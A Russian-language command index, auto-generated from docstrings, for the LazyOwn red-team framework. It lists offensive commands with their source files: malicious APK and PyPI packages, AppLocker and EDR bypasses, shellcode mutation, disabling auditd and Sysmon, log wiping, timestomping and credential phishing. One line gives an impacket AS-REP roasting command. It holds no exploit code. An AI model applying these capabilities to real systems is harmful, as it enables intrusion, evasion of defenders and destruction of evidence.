tenantФаза: разное | Источник: cli/commands/misc_migrated.py
Управление мультитенантностью: список, переключение или создание тенантов взаимодействия.
tgrepФаза: разное | Источник: cli/commands/misc_migrated.py
Поиск по всем предыдущим выводам команд и журналам сеансов.
timeline_browserФаза: разное | Источник: cli/commands/misc_migrated.py
Открыть средство просмотра временной шкалы по CSV-файлу отчета сеанса.
toast_clearФаза: разное | Источник: cli/commands/misc_migrated.py
Пометить все ожидающие события всплывающих уведомлений как просмотренные, не выводя их.
ttp_matrixФаза: разное | Источник: cli/commands/caldera.py
Отобразить матрицу покрытия MITRE ATT&CK по всем операциям.
ttp_rebuildФаза: разное | Источник: cli/commands/caldera.py
Повторно пройти по каталогу операций для обновления матрицы покрытия.
ttp_showФаза: разное | Источник: cli/commands/caldera.py
Показать детали для одной техники MITRE.
tui_themeФаза: разное | Источник: cli/commands/misc_migrated.py
Переключить цветовую тему TUI, используемую для заставки и стилизованного вывода.
unlock_targetФаза: разное | Источник: cli/commands/collaboration.py
Снять рекомендательную блокировку с цели.
urldecodeФаза: разное | Источник: cli/commands/misc_migrated.py
Декодировать URL-закодированную строку.
urlencodeФаза: разное | Источник: cli/commands/misc_migrated.py
Закодировать строку для URL.
useФаза: разное | Источник: cli/commands/module_manager.py
Выбрать модуль для работы.
vФаза: разное | Источник: cli/commands/misc_migrated.py
Открыть новое окно в сеансе tmux с использованием LazyOwn RedTeam Framework.
whoamiФаза: разное | Источник: cli/commands/cli_auth.py
Показать текущего вошедшего оператора CLI.
wizardФаза: разное | Источник: cli/commands/misc_migrated.py
Мастер первоначальной настройки с руководством — настройка rhost, lhost, домена, списков слов и другого.
lazy_payload_keysФаза: диагностика | Источник: cli/commands/diagnostics.py
Перечислить ключи, присутствующие в данный момент в полезной нагрузке родительской оболочки.
lazy_runtimeФаза: диагностика | Источник: cli/commands/diagnostics.py
Вывести интерпретатор, платформу и основные пути LazyOwn.
GETФаза: без категории | Источник: cli/commands/phishing_wizard.py
Описание отсутствует.
OPTIONSФаза: без категории | Источник: cli/commands/phishing_wizard.py
Описание отсутствует.
POSTФаза: без категории | Источник: cli/commands/phishing_wizard.py
Описание отсутствует.
adcs_escФаза: без категории | Источник: cli/commands/active_directory.py
Проверить службы сертификации Active Directory на наличие уязвимостей ESC1-ESC13.
ai_playbookФаза: некатегоризированный | Источник: cli/commands/ai.py
Сгенерировать наступательный плейбук из Nmap CSV + KB + Ollama.
ai_toggleФаза: некатегоризированный | Источник: cli/commands/ai.py
Включить или выключить встроенного ИИ-ассистента.
android_apkФаза: некатегоризированный | Источник: cli/commands/mobile_macos.py
Создать вредоносный APK с полезной нагрузкой reverse shell.
android_enumФаза: некатегоризированный | Источник: cli/commands/mobile_macos.py
Перечислить Android-устройство, подключённое через ADB.
applocker_cscФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать обход AppLocker через компиляцию и выполнение csc.exe.
applocker_installutilФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать полезную нагрузку для обхода AppLocker через InstallUtil.exe.
applocker_msbuildФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать полезную нагрузку для обхода AppLocker через MSBuild.exe.
applocker_mshtaФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать полезную нагрузку для обхода AppLocker через mshta.exe.
applocker_presentationФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать ссылку для обхода AppLocker через PresentationHost.exe.
applocker_regsvcsФаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать полезную нагрузку для обхода AppLocker через Regsvcs.exe/Regasm.exe.
applocker_rundll32Фаза: некатегоризированный | Источник: cli/commands/applocker_bypass.py
Создать обход AppLocker через rundll32.exe с помощью SCT-скриптлета.
arsenal_showФаза: некатегоризированный | Источник: cli/commands/payload_arsenal.py
Показать элементы арсенала полезных нагрузок.
askФаза: некатегоризированный | Источник: cli/commands/ai.py
Задать вопрос ИИ с предварительно загруженным контекстом текущей сессии.
attack_surfaceФаза: некатегоризированный | Источник: cli/commands/reporting.py
Сгенерировать сводку поверхности атаки из данных разведки.
audit_complete_keysФаза: некатегоризированный | Источник: cli/commands/audit.py
Вывести подсказки автодополнения с учётом полезной нагрузки для частичной команды.
auditd_disableФаза: некатегоризированный | Источник: cli/commands/opsec_cleanup.py
Сгенерировать команды для отключения Linux auditd.
auto_loopФаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py
Запустить цель через автономный оркестратор-демон в фоновом режиме.
auto_populateФаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py
Разобрать последний XML-скан nmap и автоматически заполнить контекст полезной нагрузки.
autopivotФаза: некатегоризированный | Источник: cli/commands/pivoting.py
Автоматически обнаруживать внутренние сети и настраивать туннели pivot.
aws_privescФаза: некатегоризированный | Источник: cli/commands/cloud_attacks.py
Повышение привилегий и перечисление в AWS.
bof_catalogФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Перечислить все BOF, доступные в курируемом каталоге.
bof_infoФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Показать подробную информацию о BOF.
bof_installФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Установить и скомпилировать BOF, подготовив его для доставки через beacon.
bof_listФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Перечислить все установленные и подготовленные BOF.
bof_runФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Выполнить BOF на подключённом beacon.
bof_searchФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Искать в каталоге BOF по ключевому слову.
bof_uninstallФаза: некатегоризированный | Источник: cli/commands/bof_registry.py
Удалить BOF и удалить его подготовленный файл.
c2_dnsФаза: некатегоризированный | Источник: cli/commands/c2_profile.py
Настроить или отобразить профиль DNS beacon.
c2_profilesФаза: некатегоризированный | Источник: cli/commands/c2_profile.py
Перечислить все доступные транспортные профили C2.
c2_rotateФаза: некатегоризированный | Источник: cli/commands/c2_profile.py
Переключиться на следующий транспортный профиль C2 в очереди ротации.
c2_tlsФаза: некатегоризированный | Источник: cli/commands/c2_profile.py
Отобразить текущий профиль TLS C2.
campaign_sitrepФаза: некатегоризированный | Источник: cli/commands/mcp_bridge.py
Псевдоним sitrep сохранён для совместимости с глаголами MCP (lazyown_campaign_sitrep).
cicd_scanФаза: не классифицировано | Источник: cli/commands/cicd.py
Сканирование CI/CD платформы на предмет ошибок безопасности.
cicd_secretsФаза: не классифицировано | Источник: cli/commands/cicd.py
Сканирование журнала сборки на предмет утёкших секретов.
clean_adФаза: не классифицировано | Источник: cli/commands/anti_forensics.py
Очистка журналов событий Active Directory и кэшированных билетов Kerberos.
cloud_bucketsФаза: не классифицировано | Источник: cli/commands/cloud.py
Перечисление облачных хранилищ (bucket) для заданного префикса.
cloud_enumФаза: не классифицировано | Источник: cli/commands/cloud.py
Перечисление метаданных облачного провайдера, хранилищ и IAM.
cloud_iamФаза: не классифицировано | Источник: cli/commands/cloud.py
Перечисление ролей и политик IAM в облаке.
cloud_metadataФаза: не классифицировано | Источник: cli/commands/cloud.py
Сбор метаданных облачных экземпляров (AWS IMDS, Azure, GCP).
cloud_scanФаза: не классифицировано | Источник: cli/commands/cloud.py
Полное сканирование безопасности облака: метаданные + хранилища + перечисление IAM.
container_detectФаза: не классифицировано | Источник: cli/commands/containers.py
Автоматическое обнаружение среды выполнения контейнера и примитивов побега.
container_escapeФаза: не классифицировано | Источник: cli/commands/containers.py
Проверка текущего контейнера на известные векторы побега.
cover_tracksФаза: не классифицировано | Источник: cli/commands/anti_forensics.py
Выполнение всех операций анти-форензики последовательно.
crack_hashesФаза: не классифицировано | Источник: cli/commands/security.py
Взлом хэшей паролей из файла с помощью John the Ripper или Hashcat.
cross_cloudФаза: не классифицировано | Источник: cli/commands/cloud_attacks.py
Атаки на федерацию идентичности между облаками.
dacl_abuseФаза: не классифицировано | Источник: cli/commands/active_directory.py
Перечисление и эксплуатация опасных записей DACL/SACL в Active Directory.
delegation_attackФаза: не классифицировано | Источник: cli/commands/active_directory.py
Отображение вычисленных путей атак на делегирование с командами эксплуатации.
delegation_enumФаза: не классифицировано | Источник: cli/commands/active_directory.py
Перечисление конфигураций делегирования Kerberos.
depconfuseФаза: не классифицировано | Источник: cli/commands/supply_chain.py
Сканирование requirements.txt на предмет кандидатов для путаницы зависимостей.
depscanФаза: не классифицировано | Источник: cli/commands/supply_chain.py
Сканирование дерева каталогов на предмет файлов зависимостей и выявление рисков.
detect_edrФаза: не классифицировано | Источник: cli/commands/evasive_payload.py
Генерация команд для обнаружения EDR/AV на цели.
docker_enumФаза: не классифицировано | Источник: cli/commands/containers.py
Перечисление хоста Docker: контейнеры, образы, привилегии, точки монтирования.
dotnet_payloadФаза: не классифицировано | Источник: cli/commands/payload_arsenal.py
Генерация полезной нагрузки .NET/C#.
edr_detectФаза: не классифицировано | Источник: cli/commands/edr_detect.py
Обнаружение продуктов EDR/AV на цели.
edr_profileФаза: не классифицировано | Источник: cli/commands/edr_detect.py
Генерация профиля обхода на основе обнаруженного EDR.
edr_scriptФаза: не классифицировано | Источник: cli/commands/edr_detect.py
Генерация скрипта PowerShell для обнаружения EDR.
entra_attackФаза: не классифицировано | Источник: cli/commands/cloud_attacks.py
Операции атак на Microsoft Entra ID / Azure AD.
evasionФаза: не классифицировано | Источник: cli/commands/evasive_payload.py
Генерация и управление профилями обхода для C2.
evasiveФаза: не классифицировано | Источник: cli/commands/evasive_payload.py
Генерация полезных нагрузок, обходящих обнаружение, с использованием нескольких стратегий обфускации.
evasive_payloadФаза: не классифицировано | Источник: cli/commands/evasive_payload.py
Генерация обходной полезной нагрузки с автоматическим обходом AV/EDR.
event_logФаза: не классифицировано | Источник: lazyown.py
Показать последние события EventBus. Использование: event_log [N] [категория]
facts_showФаза: не классифицировано | Источник: cli/commands/mcp_bridge.py
Показать структурированные факты, извлечённые из сканирования nmap и вывода инструментов.
forensic_cleanФаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py
Очистка форензик-артефактов — Prefetch, Shimcache, Amcache, Jump Lists и т.д.
formФаза: без категории | Источник: cli/commands/audit.py
Открыть интерактивную форму для известной команды. Использование: form <команда>.
fzФаза: без категории | Источник: cli/commands/audit.py
Нечеткий поиск команд. Использование: fz [запрос]. Пустой список выводит все команды.
gcp_privescФаза: без категории | Источник: cli/commands/cloud_attacks.py
Повышение привилегий и перечисление в GCP.
gitlab_enumФаза: без категории | Источник: cli/commands/cicd.py
Перечислить экземпляр GitLab.
gpo_abuseФаза: без категории | Источник: cli/commands/active_directory.py
Перечисление и эксплуатация объектов групповой политики.
grep_logФаза: без категории | Источник: cli/commands/audit.py
Поиск по недавним выводам команд. Использование: grep_log <шаблон> [--cmd <имя>].
groqФаза: без категории | Источник: cli/commands/ai.py
Отправить запрос в API Groq, используя настроенный api_key.
jenkins_enumФаза: без категории | Источник: cli/commands/cicd.py
Перечислить экземпляр Jenkins.
k8s_attackФаза: без категории | Источник: cli/commands/cloud_attacks.py
Атака на Kubernetes — перечисление RBAC, побег из пода, etcd, постоянство.
k8s_enumФаза: без категории | Источник: cli/commands/containers.py
Перечислить кластер Kubernetes: поды, секреты, SA, RBAC.
k8s_podsФаза: без категории | Источник: cli/commands/containers.py
Список подов Kubernetes с деталями, важными для безопасности.
k8s_secretsФаза: без категории | Источник: cli/commands/containers.py
Список и декодирование секретов Kubernetes.
kerberoastФаза: без категории | Источник: cli/commands/active_directory.py
Продвинутый Kerberoasting — режим только AES, целевое перечисление SPN.
kerberos_ticketФаза: без категории | Источник: cli/commands/active_directory.py
Создание билетов Kerberos для постоянства и горизонтального перемещения.
linux_advanced_payloadФаза: без категории | Источник: cli/commands/payload_arsenal.py
Генерация продвинутых полезных нагрузок для Linux (LD_PRELOAD, eBPF, PAM, модуль ядра).
llm_budgetФаза: без категории | Источник: cli/commands/ai.py
Показать дневной бюджет LLM, лимит токенов на вызов и текущие расходы.
log_tamperФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Команды очистки журналов для разных платформ.
macos_keychainФаза: без категории | Источник: cli/commands/mobile_macos.py
Извлечение секретов из связки ключей macOS.
macos_payloadФаза: без категории | Источник: cli/commands/payload_arsenal.py
Генерация полезных нагрузок для macOS (.app-пакеты, постоянство, обход TCC).
macos_persistФаза: без категории | Источник: cli/commands/mobile_macos.py
Генерация постоянства в macOS через LaunchAgent.
macos_tccФаза: без категории | Источник: cli/commands/mobile_macos.py
Генерация обхода TCC (Transparency, Consent, Control) для macOS.
memory_cleanФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Очистка артефактов памяти — билеты Kerberos, буфер обмена, переменные окружения, учетные данные.
mfa_bypassФаза: без категории | Источник: cli/commands/cicd.py
Перечисление и тестирование методов обхода MFA.
mutate_shellcodeФаза: без категории | Источник: cli/commands/evasive_payload.py
Применение полиморфной мутации к шеллкоду для обхода сигнатур.
network_opsecФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Сетевая OPSEC — цепочки прокси, DoH, обнаружение canary, анализ трафика.
opsecФаза: без категории | Источник: cli/commands/security.py
Оценка риска OPSEC для команды LazyOwn перед выполнением.
opsec_scoreФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Оценка риска OPSEC в реальном времени с контекстным ограничением действий (v2).
orchestrateФаза: без категории | Источник: cli/commands/orchestration.py
Направить цель через единый оркестратор и вывести результат.
package_squatФаза: без категории | Источник: cli/commands/supply_chain.py
Генерация вредоносного PyPI-пакета для путаницы зависимостей.
parquet_queryФаза: без категории | Источник: cli/commands/mcp_bridge.py
Запрос к базам знаний Parquet (GTFOBins, LOLBas, ATT&CK, сеансы).
pentest_reportФаза: не категоризировано | Источник: cli/commands/reporting.py
Сгенерировать профессиональный отчёт о тесте на проникновение.
phish_reportФаза: не категоризировано | Источник: cli/commands/phishing_wizard.py
Показать результаты кампании и перехваченные учётные данные.
phish_serveФаза: не категоризировано | Источник: cli/commands/phishing_wizard.py
Запустить лёгкий HTTP-сервер для фишинговых целевых страниц.
phish_wizardФаза: не категоризировано | Источник: cli/commands/phishing_wizard.py
Интерактивный мастер фишинговой кампании от начала до конца.
pivot_killФаза: не категоризировано | Источник: cli/commands/pivoting.py
Завершить все туннели pivot и выполнить очистку.
pivot_proxyФаза: не категоризировано | Источник: cli/commands/pivoting.py
Запустить локальный SOCKS-прокси через цепочку pivot.
pivot_scanФаза: не категоризировано | Источник: cli/commands/pivoting.py
Сканировать внутренние сети через текущую цепочку pivot.
pivot_statusФаза: не категоризировано | Источник: cli/commands/pivoting.py
Показать текущее состояние цепочки pivot.
playbook_runФаза: не категоризировано | Источник: cli/commands/mcp_bridge.py
Выполнить сгенерированный YAML-плейбук пошагово через оболочку.
polymorphicФаза: не категоризировано | Источник: cli/commands/payload_arsenal.py
Применить полиморфную мутацию к шелл-коду.
rag_queryФаза: не категоризировано | Источник: cli/commands/mcp_bridge.py
Семантический поиск по артефактам сеанса (сканы, логи, заметки).
reload_addonsФаза: не категоризировано | Источник: cli/commands/audit.py
Повторное сканирование каталогов lazyaddons/ и plugins/ на предмет изменений; перезагрузка новых.
rotate_aesФаза: не категоризировано | Источник: cli/commands/security.py
Сгенерировать новый AES-ключ и повторно зашифровать все запечатанные учётные данные.
routeФаза: не категоризировано | Источник: lazyown.py
Направить запрос на естественном языке к инструменту LazyOwn. Использование: route
saas_enumФаза: не категоризировано | Источник: cli/commands/cloud_attacks.py
Перечислить SaaS-платформы — M365, Google Workspace, Salesforce, Slack, ServiceNow.
seal_credentialsФаза: не категоризировано | Источник: cli/commands/security.py
Зашифровать все чувствительные значения в payload.json с помощью AES-256-GCM.
session_stateФаза: не категоризировано | Источник: cli/commands/mcp_bridge.py
Псевдоним sitrep, сохранённый для соответствия глаголам MCP (lazyown_session_state).
setФаза: не категоризировано | Источник: lazyown.py
Установить параметр — единый интерфейс set/assign.
shredФаза: не категоризировано | Источник: cli/commands/anti_forensics.py
Безопасно удалить файлы, перезаписывая их перед удалением.
sleep_configureФаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py
Настроить активную технику обфускации сна.
sleep_infoФаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py
Показать подробную информацию о технике обфускации сна.
sleep_listФаза: не категоризировано | Источник: cli/commands/sleep_obfuscation.py
Перечислить доступные техники обфускации сна.
socks_configФаза: не категоризировано | Источник: cli/commands/socks_proxy.py
Показать или настроить SOCKS5-прокси.
socks_exportФаза: не категоризировано | Источник: cli/commands/socks_proxy.py
Экспортировать спецификацию SOCKS5-прокси для доставки beacon.
socks_sessionsФаза: не категоризировано | Источник: cli/commands/socks_proxy.py
Перечислить активные сеансы SOCKS-прокси.
staged_deliveryФаза: не категоризировано | Источник: cli/commands/payload_arsenal.py
Сгенерировать артефакты поэтапной доставки (HTA, VBA, LNK, ISO, VHD).
state_snapshotФаза: не категоризировано | Источник: lazyown.py
Показать единый снимок StateManager (кэши БД + JSON).
status_barФаза: не категоризировано | Источник: cli/commands/orchestration.py
Просмотреть, переключить и обновить строку состояния приглашения.
status_tailФаза: не категоризировано | Источник: cli/commands/audit.py
Вывести живой прогресс из последнего файла sessions/scan_*.partial.
sysmon_disableФаза: не категоризировано | Источник: cli/commands/opsec_cleanup.py
Сгенерировать команды для отключения Windows Sysmon.
threat_modelФаза: не категоризировано | Источник: cli/commands/mcp_bridge.py
Построить или проверить модель угроз, полученную из событий сеанса.
timelineФаза: без категории | Источник: cli/commands/mcp_bridge.py
Псевдоним timeline_browser сохранён для совместимости с глаголами MCP (lazyown_timeline).
timestompФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Изменяет MACB-временные метки файлов, чтобы обойти судебный анализ временной шкалы.
unseal_credentialsФаза: без категории | Источник: cli/commands/security.py
Расшифровывает запечатанные значения учётных данных в payload.json для проверки.
vuln_listФаза: без категории | Источник: cli/commands/reporting.py
Выводит список обнаруженных уязвимостей из базы данных сессий.
wipe_freeФаза: без категории | Источник: cli/commands/anti_forensics.py
Очищает свободное дисковое пространство для предотвращения судебного восстановления файлов.
wipe_logsФаза: без категории | Источник: cli/commands/anti_forensics.py
Очищает системные журналы на удалённой цели.
wipe_timelineФаза: без категории | Источник: cli/commands/anti_forensics.py
Затирает временные метки файлов и историю команд на цели.
Автоматически сгенерировано readmeneitor.py из исходных docstring и cli/command_index.json.
alterxФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет команду 'alterx' для перечисления поддоменов по указанному self.params['domain']. Если 'alterx'
apache_usersФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет перечисление пользователей целевой системы с помощью apache-users.
binarycheckФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет различные проверки выбранного бинарного файла для сбора информации и определения защит.
cveФаза: разведка | Источник: cli/commands/recon_migrated.py
Поиск CVE с использованием API CIRCL.
digФаза: разведка | Источник: cli/commands/recon.py
Выполняет команду dig для запроса DNS-информации.
dnschefФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет инструмент DNSChef для мониторинга DNS-запросов и перехвата ответов.
dnsenumФаза: разведка | Источник: cli/commands/recon.py
Выполняет перечисление DNS с помощью dnsenum для определения поддоменов заданного домена.
dnsmapФаза: разведка | Источник: cli/commands/recon.py
Выполняет перечисление DNS с помощью dnsmap для обнаружения поддоменов указанного домена.
dnstool_pyФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет инструмент dnstool.py для изменения DNS-записей, интегрированных с Active Directory.
estorides_importФаза: разведка | Источник: cli/commands/estorides.py
Импорт сущностей, обнаруженных Estorides, в базу данных и область LazyOwn.
estorides_loopФаза: разведка | Источник: cli/commands/estorides.py
Запуск двунаправленного цикла обратной связи Estorides <-> LazyOwn.
estorides_seedФаза: разведка | Источник: cli/commands/estorides.py
Передача хостов/доменов LazyOwn в Estorides для пассивного OSINT-обнаружения.
estorides_surfaceФаза: разведка | Источник: cli/commands/estorides.py
Показ комбинированной активной и пассивной поверхности атаки.
finalreconФаза: разведка | Источник: cli/commands/recon.py
Запускает инструмент finalrecon для выполнения сканирования уязвимостей веб-сервера по указанному целевому хосту.
getcapФаза: разведка | Источник: cli/commands/recon_migrated.py
Получение и отображение возможностей файлов в системе.
gospiderФаза: разведка | Источник: cli/commands/recon_migrated.py
Попробуйте gospider для веб-сканирования.
grauditФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет команду graudit для проведения статического анализа кода с указанными параметрами.
httprobeФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет инструмент httprobe для проверки доменов на наличие работающих HTTP и HTTPS серверов.
ipinfoФаза: recon | Источник: cli/commands/recon_migrated.py
Получает подробную информацию об IP-адресе с помощью API ARIN.
launchpadФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет поиск пакетов на Launchpad на основе указанного поискового запроса и извлекает кодовые имена из результатов. Дистрибутив извлекается из поискового запроса.
metabigorФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет команды Metabigor для задач OSINT и сканирования с управляемым вводом или предопределёнными аргументами.
openssl_sclientФаза: recon | Источник: cli/commands/recon.py
Использует openssl s_client для подключения к указанному хосту и порту, что позволяет тестировать и отлаживать SSL/TLS-соединения.
pingФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет ping для проверки доступности хоста и определения операционной системы на основе значений TTL.
portsФаза: recon | Источник: cli/commands/recon_migrated.py
Перечисляет все открытые TCP и UDP порты на локальной системе.
proxyФаза: recon | Источник: cli/commands/recon_migrated.py
Запускает небольшой прокси-сервер для изменения HTTP-запросов на лету.
reconФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет разведку по указанному self.params['domain'] с использованием crt.sh (цель должна быть доступна в интернете), pup, httprobe и EyeWitness.
serveralive2Фаза: recon | Источник: cli/commands/recon_migrated.py
Команда serveralive2: использует Impacket для подключения к удалённому интерфейсу MSRPC и получает привязки сервера.
sherlockФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет инструмент Sherlock для поиска имён пользователей в социальных сетях.
sslscanФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет SSL-сканирование указанного удалённого хоста.
surfaceФаза: recon | Источник: cli/commands/recon_migrated.py
Отображает граф сетевой поверхности в терминале.
tcpdump_captureФаза: recon | Источник: cli/commands/recon_migrated.py
Запускает захват пакетов с помощью tcpdump на указанном интерфейсе.
tcpdump_icmpФаза: recon | Источник: cli/commands/recon_migrated.py
Запускает tcpdump для захвата ICMP-трафика на указанном интерфейсе.
traceФаза: recon | Источник: cli/commands/recon_migrated.py
Прослеживает DNS-информацию для заданного self.params['domain'] с использованием сервиса FreeDNS. (используется IP FreeDNS, а не ваш IP)
trufflehogФаза: recon | Источник: cli/commands/recon_migrated.py
Выполняет trufflehog для поиска секретов в указанном URL Git-репозитория.
tshark_analyzeФаза: recon | Источник: cli/commands/recon_migrated.py
Анализирует файл захвата пакетов с помощью tshark на основе указанного IP-адреса удалённого хоста.
waybackmachineФаза: recon | Источник: cli/commands/recon_migrated.py
Извлекает URL-адреса из Wayback Machine для указанного веб-сайта.
whatwebФаза: recon | Источник: cli/commands/recon.py
Выполняет сканирование для определения технологий веб-сайта с помощью whatweb.
windapsearchscrapeusersФаза: recon | Источник: cli/commands/recon_migrated.py
Извлекает имена пользователей из JSON-вывода, созданного go-windapsearch, и добавляет их
ad_ldap_enumФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет ad-ldap-enum для перечисления объектов Active Directory (пользователи, группы, компьютеры)
allinФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент AlliN.py с различными режимами сканирования и параметрами.
amassФаза: enum | Источник: cli/commands/scan.py
Выполняет Amass для пассивного перечисления заданного домена.
arjunФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет сканирование Arjun по указанному URL для обнаружения параметров.
arpscanФаза: enum | Источник: cli/commands/scan.py
Выполняет ARP-сканирование с помощью arp-scan.
batchnmapФаза: enum | Источник: cli/commands/recon.py
Запускает внутренний модуль modules/lazynmap.sh для множественных Nmap-сканирований.
bbotФаза: enum | Источник: cli/commands/scan.py
Выполняет BBOT-сканирование для проведения различных разведывательных задач.
blazyФаза: enum | Источник: cli/commands/scan_migrated.py
Команда blazy: устанавливает и запускает blazy для сканирования веб-приложений на множественные уязвимости.
bloodhoundФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет перечисление LDAP с помощью bloodhound-python, используя учетные данные из файла.
breacherФаза: enum | Источник: cli/commands/scan_migrated.py
Команда breacher: устанавливает и запускает Breacher для поиска страниц входа администратора и уязвимостей EAR.
certipyФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Certipy для взаимодействия со службами сертификации Active Directory.
certipy_adФаза: enum | Источник: cli/commands/scan_migrated.py
Запускает certipy-ad против служб сертификации Active Directory.
changemeФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет сканирование changeme по указанному целевому URL-адресу или хосту.
cmeФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет CrackMapExec (CME) для перечисления SMB и попыток аутентификации против цели.
davtestФаза: enum | Источник: cli/commands/scan_migrated.py
Проверяет конфигурации WebDAV-сервера с помощью davtest.
dirsearchФаза: enum | Источник: cli/commands/scan.py
Запускает инструмент dirsearch для перечисления каталогов и файлов по указанному URL-адресу.
dmitryФаза: enum | Источник: cli/commands/scan.py
Эта функция формирует и выполняет команду для инструмента 'dmitry'.
enum4linuxФаза: enum | Источник: cli/commands/enum.py
Выполняет сбор информации с целевой Linux/Unix-системы с помощью enum4linux.
enum4linux_ngФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет сбор информации с целевой системы с помощью enum4linux-ng.
evil_ssdpФаза: enum | Источник: cli/commands/scan_migrated.py
Запускает evil-ssdp с различными параметрами и выбранными пользователем шаблонами.
feroxbusterФаза: enum | Источник: cli/commands/scan.py
Команда feroxbuster: устанавливает и запускает Feroxbuster для выполнения принудительного просмотра и перебора каталогов.
finger_user_enumФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент finger-user-enum для перечисления пользователей на целевом хосте.
fuzzФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет скрипт фаззинга веб-сервера с параметрами, предоставленными пользователем.
getnpusersФаза: enum | Источник: cli/commands/enum.py
sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt
gobusterФаза: enum | Источник: cli/commands/scan.py
Использует gobuster для перебора каталогов и виртуальных хостов на основе предоставленных параметров. Поддерживает перечисление каталогов и обнаружение виртуальных хостов.
hostdiscoverФаза: enum | Источник: cli/commands/scan.py
Обнаруживает активные хосты в подсети, выполняя ping-сканирование.
houndФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент hound: Hound — это простой и легкий инструмент для сбора информации и получения точных GPS-координат.
kerbruteФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Kerbrute для перечисления учетных записей пользователей против указанного целевого контроллера домена self.params['domain'].
lazynmapФаза: enum | Источник: cli/commands/recon.py
Запускает внутренний модуль modules/lazynmap.sh в целевом режиме.
ldapdomaindumpФаза: enum | Источник: cli/commands/scan_migrated.py
Выгружает информацию LDAP с помощью ldapdomaindump, используя учетные данные из файла.
ldapsearchФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет поиск LDAP против целевого удаленного хоста (self.params['rhost']) и сохраняет результаты.
lookupsidФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Impacket lookupsid для перечисления SID в целевой системе.
lookupsid_pyФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент LookupSID для перечисления SID в целевой системе.
loxsФаза: enum | Источник: cli/commands/scan_migrated.py
Команда loxs: устанавливает и запускает Loxs для сканирования веб-приложений на множественные уязвимости.
lynisФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет аудит Lynis на указанной удалённой системе.
magicreconФаза: перечисление | Источник: cli/commands/scan.py
Команда magicrecon: автоматизирует настройку и использование MagicRecon для выполнения различных видов разведки и сканирования уязвимостей на указанных целях.
mqtt_check_pyФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент проверки MQTT для проверки учётных данных на целевой системе с опциональным использованием SSL.
nbtscanФаза: перечисление | Источник: cli/commands/recon.py
Выполняет сетевое сканирование с помощью nbtscan для обнаружения NetBIOS-имён и адресов в указанном диапазоне.
net_rpc_addmemФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет команду net rpc group addmem для добавления пользователя в указанную группу в Active Directory.
netexecФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет netexec с различными параметрами для операций с сетевыми протоколами.
netviewФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Impacket netview для перечисления сетевых ресурсов на указанной цели.
niktoФаза: перечисление | Источник: cli/commands/recon.py
Запускает инструмент nikto для выполнения сканирования веб-сервера на уязвимости против указанного целевого хоста.
nmapscriptФаза: перечисление | Источник: cli/commands/scan.py
Выполняет сканирование Nmap с использованием указанного скрипта и порта.
nucleiФаза: перечисление | Источник: cli/commands/scan.py
Выполняет сканирование Nuclei по указанному целевому URL или хосту.
odatФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда odat: запускает модуль sidguesser из ODAT для подбора SID Oracle на целевой базе данных Oracle.
openredirexФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда openredirex: клонирует, устанавливает и запускает OpenRedirex для тестирования уязвимостей открытого перенаправления.
osmedeusФаза: перечисление | Источник: cli/commands/scan.py
Выполняет сканирование Osmedeus с управляемым вводом для различных сценариев сканирования.
parseroФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет сканирование parsero по указанному целевому URL или хосту.
parthФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда parth: устанавливает и запускает Parth для обнаружения уязвимых URL и параметров.
